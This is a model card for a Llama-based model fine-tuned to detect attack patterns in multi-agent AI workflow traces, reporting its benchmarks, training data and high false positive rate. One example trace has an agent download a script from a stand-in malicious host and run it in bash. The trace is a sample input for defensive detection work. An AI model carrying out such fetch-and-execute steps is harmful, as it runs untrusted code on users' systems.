Instructions to use guerilla7/agentic-safety-gguf with libraries, inference providers, notebooks, and local apps. Follow these links to get started.

Libraries

How to use guerilla7/agentic-safety-gguf with llama-cpp-python:

# !pip install llama-cpp-python

from llama_cpp import Llama

llm = Llama.from_pretrained(
	repo_id="guerilla7/agentic-safety-gguf",
	filename="agentic-safety-v4-q4_k_m.gguf",
)

llm.create_chat_completion(
	messages = "No input example has been defined for this model task."
)

Notebooks
Google Colab
Kaggle
Local Apps

llama.cpp

How to use guerilla7/agentic-safety-gguf with llama.cpp:

Install from brew

brew install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M
# Run inference directly in the terminal:
llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M

Install from WinGet (Windows)

winget install llama.cpp
# Start a local OpenAI-compatible server with a web UI:
llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M
# Run inference directly in the terminal:
llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M

Use pre-built binary

# Download pre-built binary from:
# https://github.com/ggerganov/llama.cpp/releases
# Start a local OpenAI-compatible server with a web UI:
./llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M
# Run inference directly in the terminal:
./llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M

Build from source code

git clone https://github.com/ggerganov/llama.cpp.git
cd llama.cpp
cmake -B build
cmake --build build -j --target llama-server llama-cli
# Start a local OpenAI-compatible server with a web UI:
./build/bin/llama-server -hf guerilla7/agentic-safety-gguf:Q4_K_M
# Run inference directly in the terminal:
./build/bin/llama-cli -hf guerilla7/agentic-safety-gguf:Q4_K_M

Use Docker

docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M

LM Studio
Jan
Ollama
How to use guerilla7/agentic-safety-gguf with Ollama:
```
ollama run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
```

Unsloth Studio new

How to use guerilla7/agentic-safety-gguf with Unsloth Studio:

Install Unsloth Studio (macOS, Linux, WSL)

curl -fsSL https://unsloth.ai/install.sh | sh
# Run unsloth studio
unsloth studio -H 0.0.0.0 -p 8888
# Then open http://localhost:8888 in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting

Install Unsloth Studio (Windows)

irm https://unsloth.ai/install.ps1 | iex
# Run unsloth studio
unsloth studio -H 0.0.0.0 -p 8888
# Then open http://localhost:8888 in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting

Using HuggingFace Spaces for Unsloth

# No setup required
# Open https://huggingface.co/spaces/unsloth/studio in your browser
# Search for guerilla7/agentic-safety-gguf to start chatting

Docker Model Runner
How to use guerilla7/agentic-safety-gguf with Docker Model Runner:
```
docker model run hf.co/guerilla7/agentic-safety-gguf:Q4_K_M
```

Lemonade

How to use guerilla7/agentic-safety-gguf with Lemonade:

Pull the model

# Download Lemonade from https://lemonade-server.ai/
lemonade pull guerilla7/agentic-safety-gguf:Q4_K_M

Run and chat with the model

lemonade run user.agentic-safety-gguf-Q4_K_M

List all available models

lemonade list

agentic-safety-gguf

Research Paper:(https://arxiv.org/abs/2601.00848)

Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples + 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarks—a +31.43-point improvement over base model (p < 0.001).

🎯 Key Capabilities

✅ Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
✅ OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
✅ Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
✅ Multi-Agent Security: Detects coordination attacks in distributed agent systems

⚠️ Critical Production Warning

NOT production-ready for automated security decisions:

False Positive Rate: 66.7% on benign workflow traces
Trace Accuracy: 30% overall (60% TPR, 0% TNR)
Root Cause: Training data heavily skewed toward attacks (90% malicious)
Deployment: Human-in-the-loop oversight mandatory - suitable for monitoring/alerting only, not automated blocking

See research paper for detailed analysis and proposed V5 improvements.

📊 Performance Summary

Benchmark	Base Model	agentic-safety-gguf	Improvement
Custom MCQA Overall	42.86%	74.29%	+31.43 pts
Agentic AI Security	40.0%	70.0%	+30.0 pts
Traditional Security	44.0%	76.0%	+32.0 pts
MMLU Computer Security	-	74.0%	-
MMLU Security Studies	-	72.24%	-

Statistical Validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)

Iterative Training: V2 baseline (80,851 ex) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.

🚀 Quick Start

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]

inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)

Analyzing Workflow Traces

import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use model as above with prompt

⚠️ Warning: 66.7% FPR requires human review before taking action.

📖 Use Cases

✅ Recommended

Security research on agentic AI vulnerabilities
Educational demonstrations (OWASP Top 10)
Prototype development for security tools
Knowledge assistance (74% MCQA accuracy)

❌ Not Recommended

Production security monitoring without human oversight
Automated security decisions (30% trace accuracy insufficient)
Mission-critical applications
Regulatory compliance automation

🎓 Training Details

Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training

Complete dataset: guerilla7/agentic-safety-gguf

Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)
Loss: 3.68 → 0.52 (85.99% reduction)

See research paper for the complete methodology, ablation studies, and statistical analysis.

📚 Resources

Dataset Repository: datasets/guerilla7/agentic-safety-gguf
Research Paper: (https://arxiv.org/abs/2601.00848)
Training Scripts: Complete QLoRA implementation, evaluation code, GGUF quantization utilities

📄 Citation

@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}

⚖️ Limitations

High False Positive Rate (66.7%): Unsuitable for production without human oversight
Small Evaluation Sample: 30 trace evaluation (±18% confidence intervals)
Synthetic Data Bias: 43% synthetic training data
ARM64-Specific: Training validated on DGX Spark only
No Commercial Comparison: Not benchmarked against GPT-4/Claude

Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.

📅 Updates

2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper

License

Apache 2.0

Downloads last month: 87

GGUF

Model size

8B params

Architecture

llama

Hardware compatibility

4-bit

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support

Model tree for guerilla7/agentic-safety-gguf

Base model

meta-llama/Llama-3.1-8B

Finetuned

fdtn-ai/Foundation-Sec-8B

Finetuned

fdtn-ai/Foundation-Sec-8B-Instruct

Quantized

(10)

this model

Paper for guerilla7/agentic-safety-gguf

Temporal Attack Pattern Detection in Multi-Agent AI Workflows: An Open Framework for Training Trace-Based Security Models

Paper • 2601.00848 • Published Dec 29, 2025

Evaluation results

Overall Accuracy
self-reported

74.290
Agentic AI Security
self-reported

70.000